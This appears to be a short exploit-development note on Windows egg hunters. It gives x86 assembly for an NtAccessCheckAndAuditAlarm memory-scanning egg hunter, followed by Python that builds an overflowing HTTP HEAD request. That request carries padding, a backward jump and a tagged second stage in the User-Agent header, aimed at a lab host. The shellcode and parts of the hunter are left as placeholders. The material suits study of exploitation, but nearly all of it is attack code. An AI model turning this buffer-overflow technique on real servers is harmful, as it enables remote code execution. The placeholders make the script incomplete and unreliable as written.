Windows Exploit Development - Egg Hunters

loop_inc_page:
  or    dx, 0x0fff                    // Add PAGE_SIZE-1 to edx
loop_inc_one:
  inc   edx                           // Increment our pointer by one

loop_check:
  push  edx                           // Save edx
  push  0x2                           // Push NtAccessCheckAndAuditAlarm
  pop   eax                           // Pop into eax
  int   0x2e                          // Perform the syscall
  cmp   al, 0x05                      // Did we get 0xc0000005 (ACCESS_VIOLATION) ?
  pop   edx                           // Restore edx
loop_check_8_valid: 
  je    loop_inc_page                 // Yes, invalid ptr, go to the next page

is_egg:
  mov   eax, 0x66333362               // Throw our egg in eax
  mov   edi, edx                      // Set edi to the pointer we validated
  scasd                               // Compare the dword in edi to eax
  jnz   loop_inc_one                  // No match? Increment the pointer by one

  scasd                               // Compare the dword in edi to eax again (which is now edx + 4)

  jnz   loop_inc_one                  // No match? Increment the pointer by one

matched:
  jmp   edi                           // Found the egg.  Jump 8 bytes past it into our code.

cyclic = '......' # lazy to copy here
request = (
    'HEAD /' + cyclic + ' HTTP/1.1\r\n'
    'Host: 192.168.1.115:6666\r\n'
    'User-Agent: .......\r\n'
    'Keep-Alive: 115\r\n'
    'Connection: keep-alive\r\n\r\n'
)

jmp 0xffffffc4 ;/xeb/xc4

padding = 'A'*478
egg_hunter = '....' # too lazy to write whole egg hunter
jmp_egg = '\xeb\xc4'
stage2 = 'b33fb33f' # tag, egg hunter find shellcode by compare with these 8 bytes
stage2 += '[shellcode]' # too lazy to write shellcode
payload = padding + egg_hunter + 'A'*5 + jmp_egg
request = (
    'HEAD /' + payload + ' HTTP/1.1\r\n'
    'Host: 192.168.1.115:6666\r\n'
    'User-Agent: ' + stage2 + '\r\n'
    'Keep-Alive: 115\r\n'
    'Connection: keep-alive\r\n\r\n'
)